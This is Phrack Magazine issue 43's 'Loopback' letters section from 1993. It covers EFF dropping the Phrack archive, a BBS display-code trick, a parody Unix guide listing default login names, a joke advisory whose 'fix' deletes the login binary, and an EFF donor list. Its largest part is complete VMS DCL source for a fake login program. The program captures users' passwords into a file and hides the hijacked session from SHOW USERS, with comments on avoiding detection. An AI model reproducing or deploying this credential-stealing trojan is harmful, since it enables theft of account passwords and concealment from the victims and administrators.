home *** CD-ROM | disk | FTP | other *** search
- ==Phrack Magazine==
-
- Volume Four, Issue Forty-Three, File 2 of 27
-
- Phrack Loopback
- Part I
-
- ****************************************************************************
-
- COMING NEXT ISSUE
-
- Van Eck Info (Theory & Practice)
- More Cellular (Monitoring Reverse Channel, Broadcasting, Reprogramming)
- HUGE University Dialup List (Mail Us YOUR School's Dialup NOW!)
- Neato Plans For Evil Devices
- Gail Thackeray Gifs
-
- *********************************** M A I L *********************************
-
- Chris,
-
- Craig Neidorf gave me these addresses as ways to reach you. He tells me
- that you are currently editing Phrack. I hope you are well.
-
- Recently the EFF sysadmins, Chris Davis and Helen Rose, informed me that
- eff.org was using so much of its T-1 bandwidth that UUNET, who supplies our
- IUP connection, was charging us an extra $1,000 per month. They did some
- investigation at my request. We determined that Phrack traffic alone was
- responsible for over 40% of the total bytes transferred from the site over
- the past year or so. This is several gigabytes per month. All in all, the
- CuD archive, which contains Phrack, CuD, and other publications accounts
- for 85% of our total traffic. All of the email to and from EFF, Usenet
- traffic, and other FTP (from the EFF archive, the CAF archive, and others)
- constitutes about 15%.
-
- EFF isn't going to be able to carry it any more because it is effectively
- costing us $1,000 per month. The fundamental problem is that Phrack is so
- popular (at least as a free good) to cause real expense in transmission
- costs. Ultimately the users are going to have to pay the costs because
- bandwidth (when measures in gigabytes anyway) isn't free. The 12K per
- year it costs us to carry Phrack is not something which EFF can justify in
- its budget. I'm sure you can understand this.
-
- On July 1, eff.org moves from Cambridge to Washington, DC which is when I
- expect we will stop carrying it. I wanted to raise this issue now to let
- you know in advance of this happening.
-
- I have also asked Chris and Helen to talk to Brendan Kehoe, who actually
- maintains the archive, to see whether there is anything we can do to help
- find another site for Phrack or make any other arrangement which will
- result in less loss of service.
-
- Mitch
-
-
-
- ------------------------------------------------------------------------------
- Mitchell Kapor, Electronic Frontier Foundation
- Note permanent new email address for all correspondence as of 6/1/93
- mkapor@kei.com
-
-
- [Editor: Well, all things must come to an end. Looks like EFF's
- move to Washington is leaving behind lots of bad
- memories, and looking forward to a happy life in the hotbed
- of American politics. We wish them good luck. We also
- encourage everyone to join.........CPSR.
-
- In all fairness, I did ask Mitch more detail about the
- specifics of the cost, and he explained that EFF was paying
- flat rate for a fractional T-1, and whenever they went over
- their allotted bandwidth, they were billed above and beyond
- the flat rate. Oh well. Thank GOD for Len Rose.
- Phrack now has a new home at ftp.netsys.com.]
-
- ****************************************************************************
-
- I'm having a really hard time finding a lead to the Information
- America Network. I am writing you guys as a last resort. Could
- you point me in the right direction? Maybe an access number or
- something? Thanks you very much.
-
- [Editor: You can reach Information America voice at 404-892-1800.
- They will be more than happy to send you loads of info.]
-
- ****************************************************************************
-
- To whom it may concern:
- This is a submission to the next issue of phrack...thanks for the great
- 'zine!
- ----------------------------cut here-------------------------------
- Greetings Furds:
-
- Have you ever wanted to impress one of those BBS-babes with your astounding
- knowledge of board tricks? Well *NOW* you can! Be the life of the party!
- Gain and influence friends! Irritate SysOps! Attain the worship and
- admiration of your online pals. Searchlight BBS systems (like many other
- software packages) have internal strings to display user information in
- messages/posts and the like. They are as follows (tested on Searchlight BBS
- System v2.25D):
-
- \%A = displays user's access level
- \%B = displays baud rate connected at
- \%C = unknown
- \%F = unknown
- \%G = displays graphics status
- \%K = displays user's first name
- \%L = displays system time
- \%M = displays user's time left on system
- \%N = displays user's name in format: First Last
- \%O = times left to call "today"
- \%P = unknown
- \%S = displays line/node number and BBS name
- \%T = displays user's time limit
- \%U = displays user's name in format: FIRST_LAST
-
- All you gotta do is slam the string somewhere in the middle of a post or
- something and the value will be inserted for the reader to see.
-
- Example: Hey there chump, I mean \%K, you better you better UL or log
- off of \%S...you leach too damn many files..you got \%M mins
- left to upload some new porn GIFs or face bodily harm and
- mutilation!.
-
- ----------------------------
-
- Have phun!
- Inf0rmati0n Surfer (& Dr. Cloakenstein)
- SysOp Cranial Manifestations vBBS
-
-
- [Editor: Ya know, once a LONG LONG time ago, I got on a BBS and
- while reading messages noticed that a large amount of
- messages seemed to be directed at ME!!# It took me
- about 10 minutes to figure it out, but BOY WAS I MAD!
-
- Then I added my own \%U message for the next hapless fool.
- :) BIG FUN!]
-
- ****************************************************************************
-
- -(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-
-
- SotMESC
-
- The US SotMESC Chapter is offering
- Scholarships for the 1993 school term.
-
- Entries should be single-spaced paragraphs,
- Double-spacing between paragraphs.
-
- The subject should center on an aspect of the
- Computer Culture and be between 20-30 pages long.
-
- Send entries to:
-
- SotMESC
- PO Box 573
- Long Beach, MS 39560
-
- All entries submitted will become the property of the SotMESC
-
- -()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-
-
- ****************************************************************************
-
- The Southwest Netrunner's League's
- -----------------------------------------------------------------
- WareZ RoDeNtZ Guide to UNIX!!!!
- -----------------------------------------------------------------
-
- Compiled by:The Technomancer (UNICOS,UNIX,VMS,and Amigas)
- Assists by:SysCon XIV (The Ma'Bell Rapist)
- Iron Man MK 4a (Things that make ya go boom)
-
- This file begs to be folded, spindeled,and mutilated.
- No Rights Reserved@1993
-
- -----------------------------------------------------------------
-
- Technomancer can be reached at: af604@FreeNet.hsc.colorado.edu
-
- Coming this September.... Shadowland, 68020... Watch this space.
- -----------------------------------------------------------------
-
- Part I(Basic commands)
-
- Phile Commands: ls=List Philes
- more,page=Display Phile on Yo Terminal
- cp=Copy Phile
- mv=Move or Remove Philes
- rm=Remove Philes
-
- Editor Commnds: vi=Screen Editor
-
- Dirtory cmmnds: dir=Prints Directory
- mkdir=Makes a new Directory(also a VERY bad bug)
- rmdir=Remove a Directory
- pwd=print working directory
-
- Misc. Commands: apropos=Locate commands by keyword lookup.
- whatis=Display command description.
- man=Displays manual pages online.
- cal=Prints calendar
- date=Prints the time and date.
- who=Prints out every one who is logged in
- (Well, almost everyone 7:^] )
-
- ---------------------------------------------------------------
-
- Part II(Security(UNIX security, another OXYMORON 7:^] ))
-
- If you are a useless wAReZ r0dEnT who wants to try to Netrun
- a UNIX system, try these logins....
-
- root
- unmountsys
- setup
- makefsys
- sysadm
- powerdown
- mountfsys
- checkfsys
-
-
- All I can help ya with on da passwords iz ta give you some
- simple guidelines on how they are put together....
-
- 6-8 characters
- 6-8 characters
- 1 character is a special character (exmpl:# ! ' & *)
-
- -----------------------------------------------------------------
-
- Well thats all fo' now tune in next time, same Hack-time
- same Hack-channel!!!
-
-
- THE TECHNOMANCER I have taken all knowledge
- af604@FreeNet.hsc.colorado.edu
- to be my province
-
- --
- Technomancer
- Southwest Netrunner's League
-
- *****************************************************************
-
- [Editor: This is an example of what NOT to send to Phrack.
- This is probably the worst piece of garbage I've
- received, so I had to print it. I can only hope
- that it's a private joke that I just don't get.
-
- Uh, please don't try to write something worse and
- submit it hoping to have it singled out as the
- next "worst," since I'll just ignore it.]
-
- ****************************************************************************
-
- Dear Phrack,
- I was looking through Phrack 42 and noticed the letters about password
- stealers. It just so happened that the same day I had gotten extremely
- busted for a program which was infinitely more indetectible. Such is life.
- I got off pretty well being an innocent looking female so it's no biggie.
- Anyway, I deleted the program the same day because all I could think was
- "Shit, I'm fucked". I rewrote a new and improved version, and decided to
- submit it. The basic advantages of this decoy are that a) there is no
- login failure before the user enters his or her account, and b) the
- program defines the show users command for the user so that when they
- do show users, the fact that they are running out of another account
- doesn't register on their screen.
- There are a couple holes in this program that you should probably be
- aware of. Neither of these can kick the user back into the account that
- the program is running from, so that's no problem, but the program can
- still be detected. (So basically, don't run it out of your own account...
- except for maybe once...to get a new account to run it out of) First, once
- the user has logged into their account (out of your program of course) hitting
- control_y twice in a row will cause the terminal to inquire if they are
- doing this to terminate the session on the remote node. Oops. It's really no
- problem though, because most users wouldn't even know what this meant. The
- other problem is that, if the user for some strange reason redefines show:
-
- $show == ""
-
- then the show users screen will no longer eliminate the fact that the account
- is set host out of another. That's not a big deal either, however, because
- not many people would sit around randomly deciding to redefine show.
- The reason I was caught was that I (not even knowing the word "hacker"
- until about a month ago) was dumb enough to let all my friends know about the
- program and how it worked. The word got spread to redefine show, and that's
- what happened. The decoy was caught and traced to me. Enough BS...here's the
- program. Sorry...no UNIX...just VMS.
- Lady Shade
-
- I wrote the code...but I got so many ideas from my buddies:
- Digital Sorcerer, Y.K.F.W., Techno-Pirate, Ephemereal Presence, and Black Ice
-
- ------------------------------------------------
-
- $if p1 .eqs. "SHOW" then goto show
- $sfile = ""
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- !!!! The role of the dummy file in this program is to tell if the program !!!!
- !!!! is being used as a decoy or as a substitute login for the victim. It !!!!
- !!!! does not stay in your directory after program termination. !!!!
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- $sfile = f$search("sys$system:[ZJABAD_X]dummy.txt")
- $if sfile .nes. "" then goto other
- $open/write io user.dat
- $close io
- $open/write dummy instaar_device:[miller_g]dummy.txt
- $close dummy
- $wo == "write sys$output"
- $line = ""
- $user = ""
- $pass = ""
- $a$ = ""
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- !!!! A login screen with a message informing someone of new mail wouldnt !!!!
- !!!! be too cool... !!!!
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- $set broadcast=nomail
- $set message/noidenficitaion/noseverity/nofacility/notext
- $on error then goto outer
- $!on control_y then goto inner
- $wo " [H [2J"
- $wo ""
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- !!!! insert a fake logout screen here !!!!
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- $wo " ZJABAD_X logged out at ", f$time()
- $wo " [2A"
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- !!!! This is the main body of the program. It simulates the system login !!!!
- !!!! screen. It also grabs the username and password and sticks them in !!!!
- !!!! a file called user.dat !!!!
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- $outer:
- $set term/noecho
- $inquire a$/nopun ""
- $inquire a$/nopun ""
- $set term/echo
- $c = 0
- $c1 = 0
- $c2 = 0
- $inner:
- $c2 = c2 + 1
- $if c2 .eqs. 5 then goto speedup
- $c = c + 1
- $if c .eqs. 15 then goto fail
- $if c1 .eqs. 3 then goto fail3
- $user = "a"
- $wo "Username: "
- $from_speedup:
- $set term/uppercase
- $wo " [2A"
- $read/time_out=10/prompt=" [9C " sys$command user
- $if user .eqs. "a" then goto timeout
- $set term/nouppercase
- $if user .eqs. "" then goto inner
- $set term/noecho
- $inquire pass "Password"
- $set term/echo
- $if user .eqs. "ME" then goto done
- $if pass .eqs. "" then goto fail
- $open/append io user.dat
- $write io user + " " + pass
- $close io
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- !!!! Sends the user into their account !!!!
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- $open/write io set.com
- $write io "$set host 0"
- $write io user + "/COMMAND=INSTAAR_DEVICE:[MILLER_G]FINDNEXT"
- $write io pass
- $close io
- $@set
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- !!!! Control has been returned to your account !!!!
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- $write io " [2A"
- $goto outer
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- !!!! Simulates a failure if the password is null, and also if the !!!!
- !!!! username prompt has cycled through 15 times... This is what !!!!
- !!!! the system login screen does. !!!!
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- $fail:
- $c = 1
- $c1 = c1 + 1
- $wo "User authorization failure"
- $wo " [1A"
- $goto inner
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- !!!! After the third failure, the system usually sends the screen back !!!!
- !!!! one step...this just handles that. !!!!
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- $fail3:
- $wo " [2A"
- $goto outer
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- !!!! The system keeps a timeout check in the login. If a username is not !!!!
- !!!! entered quickly enough, the timeout message is activated !!!!
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- $timeout:
- $set term/nouppercase
- $wo "Error reading command input"
- $wo "Timeout period expired"
- $wo " [2A"
- $goto outer
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- !!!! There is a feature in this program which sets the terminal to !!!!
- !!!! uppercase for the input of a username. This is wonderful for !!!!
- !!!! preventing program detection, but it does cause a problem. It slows !!!!
- !!!! the screen down, which looks suspicious. So, in the case where a !!!!
- !!!! user walks up tot he terminal and holds the return key down for a !!!!
- !!!! bit before typing in their username, this section speeds up the run !!!!
- !!!! considerably. !!!!
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- $speedup:
- $set term/nouppercase
- $fast_loop:
- $user = "a"
- $read/time_out=1/prompt="Username: " sys$command io
- $if user .eqs. "a" then goto from_speedup
- $goto fast_loop
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- !!!! This section is optional. There are many ways that you can implement !!!!
- !!!! to break out of the program when you think you have gotten enough !!!!
- !!!! passwords. 1), you can sit down at the terminal and type in a string !!!!
- !!!! for the username and pass which kicks you out. If this option is !!!!
- !!!! implemented, you should at least put in something that looks like !!!!
- !!!! you have just logged in, the program should not kick straight back !!!!
- !!!! to your command level, but rather execute your login.com. 2) You !!!!
- !!!! can log in to the account which is stealing the password from a !!!!
- !!!! different terminal and stop the process on the account which is !!!!
- !!!! running the program. This is much safer, and my recommandation. !!!!
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- $done:
- $set broadcast=mail
- $set message/facility/text/identification/severity
- $delete dummy.txt;*
- $exit
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- !!!! This section is how one covers up the fact that the account which has !!!!
- !!!! been stolen is running out of another. Basically, the area of the show!!!!
- !!!! users screen which registers this is at the far right hand side. !!!!
- !!!! This section first writes the show users data to a file and alters !!!!
- !!!! it before it is written to the screen for viewing by the user. There !!!!
- !!!! may exist many forms of the show users command in your system, and !!!!
- !!!! you may have to handle each one differently. I have written only two !!!!
- !!!! manipulations into this code to be used as an example. But looking !!!!
- !!!! at how this is preformed should be enough to allow you to write your !!!!
- !!!! own special cases. Notice that what happens to activate this section !!!!
- !!!! of the program is the computer detects the word "show" and interprets !!!!
- !!!! it as a procedure call. The words following show become variables !!!!
- !!!! passed into the program as p1, p2, etc. in the order which they !!!!
- !!!! were typed after the word show. Also, by incorporating a third data !!!!
- !!!! file into the manipulations, one can extract the terminal id for the !!!!
- !!!! account which the program is running out of and plug this into the !!!!
- !!!! place where the user's line displays his or her terminal id. Doing !!!!
- !!!! this is better that putting in a fake terminal id, but that is just a !!!!
- !!!! minor detail. !!!!
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- $show:
- $show = ""
- $show$ = ""
- $length = 0
- $ch = ""
- $full = 0
- $c = 0
- $if (f$extract(5,1,p2) .eqs. "/") .and. (f$extract(6,4,p2) .nes. "FULL") then show 'p1'
- $if (p2 .eqs. "USERS/FULL") .and. (p3 .eqs. "") then goto ufull
- $if p2 .eqs. "USERS" .and. p3 .eqs. "" then show users
- $if p2 .eqs. "USERS" .and. p3 .eqs. "" then exit
- $if p3 .eqs. "" then goto fallout
- $goto full
- $fallout:
- $show 'p2' 'p3'
- $exit
- $ufull:
- $show users/full/output=users.dat
- $goto manipulate
- $full:
- $show$ = p3 + "/output=users.dat"
- $show users 'show$'
- $manipulate:
- $set message/nofacility/noseverity/notext/noidentification
- $open/read io1 users.dat
- $open/write io2 users2.dat
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- !!!! Control_y must be dealt with here. If the user did happen to controlY !!!
- !!!! there is a chance that the files users.dat and users2.dat could be !!!
- !!!! left in their directory. That is a bad thing as we are trying to !!!
- !!!! prevent detection :) !!!
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- $on control_y then goto aborted
- $user = ""
- $test = ""
- $long = ""
- $ch = ""
- $length = 0
- $user = f$user()
- $length = f$length(user) - 2
- $user = f$extract(1,length,user)
- $read_loop:
- $read/end_of_file=eof io1 line
- $test = f$extract(1,length,line)
- $ch = f$extract (length+1,1,line)
- $if (test .eqs. user) .and. (ch .eqs. " ") then goto change
- $from_change:
- $write io2 line
- $goto read_loop
- $eof:
- $close io1
- $close io2
- $type users2.dat
- $del users.dat;*
- $del users2.dat;*
- $show == "@instaar_device:[MILLER_G]findnext show"
- $set message/facility/text/severity/identification
- $exit
- $change:
- $if f$extract(50,1,line) .nes. "" then line = f$extract(0,57,line) + "(FAKE TERMINAL INFO)"
- $goto from_change
- $aborted:
- $!if f$search("users.dat") .nes. "" then close io1
- $!if f$search("users.dat") .nes. "" then delete users.dat;*
- $!if f$search("users2.dat") .nes. "" then close io2
- $!if f$search("users2.dat") .nes. "" then delete users2.dat;*
- $close io1
- $close io2
- $delete users.dat;*
- $delete users2.dat;*
- $show == "@instaar_device:[MILLER_G]findnext show"
- $set message/facility/text/severity/identification
- $exit
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- !!!! This is the section of the program which is executed in place of the !!!!
- !!!! users login.com. It does grab their login and execute it to prevent !!!!
- !!!! suspicion, but there are a couple of hidden commands which are also !!!!
- !!!! added. They redefine the show and sys commands so that the user can !!!!
- !!!! not detect that he or she is riding off of another account. !!!!
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- $other:
- $sh$ = "@instaar_device:[miller_g]findnext show"
- $shline = "$sh*ow ==" + sh$
- $logi = ""
- $logi = f$search("login.com")
- $if logi .NES. "" then goto Ylogin
- $nologin:
- $open/write io login2.com
- $write io shline
- $close io
- $@login2
- $delete login2.com;*
- $exit
- $ylogin:
- $open/write io2 login2.com
- $open/read io1 login.com
- $transfer_loop:
- $read/end_of_file=ready io1 line
- $write io2 line
- $goto transfer_loop
- $ready:
- $write io2 "$sh*ow == ""@instaar_device:[miller_g]findnext show""
- $close io1
- $close io2
- $@login2
- $delete login2.com;*
- $exit
-
-
- [Editor: Thanks for the letter and program. I wish I could bring
- myself to use a VMS and try it out. :) Always happy
- to get notice that somewhere out there a female reads
- Phrack. By the way, "innocent female" is an oxymoron.]
-
- ****************************************************************************
-
- To: Phrack Loopback.
- From: White Crocodile.
-
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- Greetings sweet Phrack and Mr. Bloodaxe. Your "loopback reports" is
- really cool invention and I (sorry for egoisthic "I") with pleasure
- wasting time for his reading ( ex. my playboy time ). But here for
- some unknown reason appear equal style, and all loopback remind
- something medium between "relations search" [Hello Dear Phrack, I am
- security expert of our local area, but when I looked to output of
- "last" program (oh,yeah - "last" it is ...), I ocassionaly under -
- standed what apparently someone elite hacker penetrated into my
- unpassworded account! But how he knew it??? I need to talk
- with him! Please mail me at security@...] and "make yourself" [Yep.I
- totally wrote program which gets file listing from target vicitim's
- home directory in current host. After that I decided to contribute
- it for You. I hope this will help. Here is the complete C code. "rx"
- permission in target's '$HOME' required.].
- Looking similar articles like "... off Geek!" and various reports
- which don't reacheds PWN. [CENSORED BY ME].
- Resulting from abovewritten reason and I let myself to add some
- elite (oops word too complex), some bogus and little deposit to Your
- lb. He written in classic plagiarize style.
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- * * *
- Good mornin' Ladys and Gentelmen! I hacking and phreaking. I know what
- it is horrible (don't read it please - this message to Bart), but I
- doing it all the time (today already 3 month). I have not much time to
- write, and here is the subject - I broke into one military computer
- and stole their mail about new security bug!!! l00k f3r |t:
-
- - - -
- DDN & CERT
- SPECIAL REPORT*
- Sun 3.x,4.1.x login flaw
-
- Subject: The huge Sun 4.x login hole.(possibly Ulitix 3.0,BSD,AIX
- and many yet unknown systems)
-
- Impact: Allow random intruders to gain "root" access.
-
- Description:
- The huge security hole was there and waiting! Type:
-
- $ login root
-
- [ no option required ], and You are! All what You need to know its
- just root's password, but it (pw), sure, can be easily obtained from
- real root, by asking him (root). Ex - "$ talk root"
-
- Possible fix until copyrighted patch come out:
-
- #rm /usr/bin/login
- #cp /usr/games/fortune /usr/bin/login
-
- If you believe that your system has been compromised, contact CERT CC. Call
- our hotline 900-FBI-PRIVATE (24 a day,please not in dinner time or in time
- of "Silence of the Lamb"), leave Inet address of your system and number of
- private credit card.
- - - -
-
- * Report not will be printed in cert advisories in this form, becouse FBI
- need remove all hints and tips, and make him useless to intruders.
-
- DISCLAIMER: Above document written by CERT, DDN and FBI -
- all pretension to them.
-
- Thanks to gr*k (I can't write his full name for security reasons),roxtar,
- y0,Fidelio,2 scotts from Santafe,KL (He not have attitude towards this
- mail,but I included him for polite since he reserved tickets for me to
- SUMMERCON),ahh,x0d,all zero's (count,bob,nick,etc.) and many others for
- hints to me, what this bug really exist (Yep, before I stoled report).
-
- - Write You later - anonymous.
-
- P.S. Yup! If You won't think what I am toady - I wanna say also thanks to TK
- and sure Erik Bloodaxe. And also - IF after E911 incident you are more
- carefully, feel free to replace "stole" to "got" (when you'll post it), and
- do not forget to add "reprinted with permission".
-
- - Sincerely, anonymous.
-
- ----------------------------------------------------------------------
-
- [Editor: More indications that we will all be raided by the DEA
- more often than the FBI in coming years.]
-
- *****************************************************************************
-
-
- "Since my probation status forces me to be adamant about this. Illegal
- activities on Netsys cannot and will not be tolerated. Prison sucked."
-
- - Len Rose
-
- 06/6/93
-
- NETSYS COMMUNICATION SERVICES Palo Alto, California
-
- Netsys is a network of large Sun servers dedicated to providing
- Internet access to individuals and corporations that need solid,
- reliable Internet connectivity. Netsys is at the hub of major
- Internet connectivity.
-
- Netsys is a system for professionals in both the Internet and Unix
- community. The public image is important to us. Illegal activities
- cannot be tolerated.
-
- Netsys has every feature you could possibly need.
-
- Netsys is lightly loaded, extremely reliable and dedicated to providing
- full time 24 hour Internet access.
-
- Support: 24 hour emergency response service.
-
- Dialups: Palo Alto area, High Speed (V.32 and PEP)
-
- Private Accounts: $20 monthly ( with file storage capacity of 5 megabytes)
-
- $1 per megabyte per month over 5 megabytes.
-
- Commercial Accounts: $40 monthly (file storage capacity of 10 megabytes)
- $1 per megabyte per month over 10 megabytes.
-
- Newsfeeds: We offer both nntp and uucp based newsfeeds , with all domestic
- newsgroups, and including all foreign newsgroups.
-
- SPECIAL FEATURES THAT NO ONE ELSE CAN PROVIDE
-
- Satellite Weather: Netsys has available real time satellite weather
- imagery. Images are available in gif, or Sun raster
- format. Contact us for NFS mirroring, and other special
- arrangement. These images are directly downlinked from
- the GOES bird. Contact Steve Eigsti (steve@netsys.com)
-
- Satellite Usenet: Netsys is offering Pagesat's satellite newsfeed service
-
- for large volume news distribution. Members of Netsys
- can obtain substantial discounts for the purchase and
- service costs of this revolutionary method of Usenet news
- distribution. Both Unix and MS Windows software available.
- Contact (pagesat@pagesat.com) for product information.
-
- Paging Services: Netsys is offering Pagesat's Internet to Pager mail service.
- Members of Netsys can obtain critical email to pager
- services. Pagesat has the ability to gateway any critical
- electronic mail to your display pager.
-
- Leased Line Internet Connections
-
- Pagesat Inc. offers low cost 56k and T1 Internet connections all over the
- United States. Since Pagesat is an FCC common carrier, our savings on
- leased lines can be passed on to you. For further information, contact
- Duane Dubay (djd@pagesat.com).
-
- We offer other services such as creating domains, acting as MX
- forwarders, and of course uucp based newsfeeds.
-
- Netsys is now offering completely open shell access to Internet users.
- For accounts, or more information , send mail to netsys@netsys.com
-
- Netsys will NEVER accept more members than our capacity to serve.
-
- Netsys prides itself on it's excellent connectivity (including multiple T1's,
- and SMDS), lightly loaded systems, and it's clientele.
-
- We're not your average Internet Service Provider. And it shows.
- --------------------------------------------------------------------
- [Editor: We here at Phrack are forever in debt to Mr. Len Rose for
- allowing us to use ftp.netsys.com as our new official FTP
- site after getting the boot off EFF. It takes a steel
- set of huevos to let such an evil hacker publication
- reside on your hard drive after serving time for having
- dealings with evil hackers. We are STOKED! Thanks Len!
- Netsys is not your average site, INDEED!]
-
- ****************************************************************************
-
- Something Phrack might like to see:
-
- The contributors to and practices of the Electronic Frontier Foundation
- disclose quite accurately, just who this organization represents. We
- challenge the legitimacy of the claim that this is a "public interest"
- advocate. Here is a copy of their list of contributors:
-
- [FINS requested the Office of the Attorney General of the Commonwealth of
- Massachusetts to provide us with a list of contributors of over $5000, to
- the Electronic Frontier Foundation, required by IRS Form 990. Timothy E.
- Dowd, of the Division of Public Charities, provided us with a list (dated
- January 21, 1993), containing the following information. No response was
- given to a phone request by FINS directly to EFF, for permission to inspect
- and copy the most current IRS Form 990 information.]
-
-
-
- ELECTRONIC FRONTIER FOUNDATION, INC.
- IRS FORM 990. PART I - LIST OF CONTRIBUTIONS
-
-
- NAME AND ADDRESS OF CONTRIBUTOR CONTRIBUTION
- DATE AMOUNT
-
- Kapor Family Foundation
- C/O Kapor Enterprises, Inc.
- 155 2nd Street
- Cambridge, MA 02141 Var 100,000
-
- Mitchell D. Kapor
- 450 Warren Street
- Brookline, MA 02146 Var 324,000
-
- Andrew Hertzfeld
- 370 Channing Avenue
- Palo Alto, CA 94301 12/12/91 5,000
-
-
- Dunn & Bradstreet
- C/O Michael F. ...
- 1001 G Street, NW Suite 300 East
- Washington, DC 20001 02/12/92 10,000
-
- National Cable Television
- 1724 Massachusetts Avenue, NW
- Washington, DC 20036 02/18/92 25,000
-
-
- MCI Communications Corporation
- 1133 19th Street, NW
- Washington, DC 20036 03/11/92 15,000
-
- American Newspaper Publishers
- Association
- The Newspaper CTR
- 11600 Sunrise Valley
- Reston, VA 22091 03/23/92 20,000
-
- Apple Computer
- 20525 Mariani Avenue MS:75-61
- Cupertino, CA 95014 03/23/92 50,000
-
- Sun Microsystems, Inc
- c/o Wayne Rosing
- 2550 Garcia Ave
- Mountain View, CA 94043-1100 04/03/92 50,000
-
- Adobe Systems, Inc.
- c/o William Spaller
- 1585 Charlestown Road
- Mountain View, CA 94039-7900 04/16/92 10,000
-
- International Business Systems
- c/o Robert Carbert, Rte 100
- Somers, NY 10589 05/07/92 50,000
-
- Prodigy Services Company
- c/o G. Pera...
- 445 Hamilton Avenue
- White Plains, NY 10601 05/07/92 10,000
-
- Electronic Mail Associates
- 1555 Wilson Blvd. Suite 300
- Arlington, VA 22209 05/13/92 10,000
-
- Microsoft
- c/o William H. Neukom
- 1 Microsoft Way
- Redmond, VA 98052 06/25/92 50,000
-
- David Winer
- 933 Hermosa Way
- Menio Park, CA 94025 01/02/92 5,000
-
- Ed Venture Holdings
- c/o Ester Dvson
- 375 Park Avenue
- New York, NY 10152 03/23/92 15,000
-
- Anonymous 12/26/91 10,000
-
- Bauman Fund
- c/o Patricia Bauman
- 1731 Connecticut Avenue
- Washington, DC 20009-1146 04/16/92 2,500
-
- Capital Cities ABA
- c/o Mark MacCarthy
- 2445 N. Street, NW Suite 48
- Washington, DC 20037 05/04/92 1,000
-
- John Gilmore
- 210 Clayton Street
- San Francisco, CA 94117 07/23/91 1,488
- 08/06/91 100,000
-
- Government Technology 10/08/91 1,000
-
- Miscellaneous 04/03/91 120
-
- Apple Writers Grant
- c/o Apple Computer
- 20525 Mariani Avenue 01/10/92 15,000
-
-
- [Editor: Well, hmmm. Tell you guys what: Send Phrack that
- much money and we will give up our ideals and move to
- a new location, and forget everything about what we
- were all about in the beginning. In fact, we will turn
- our backs on it. Fair?
-
- I was talking about me moving to Europe and giving
- up computers. Don't read anything else into that. Nope.]
-
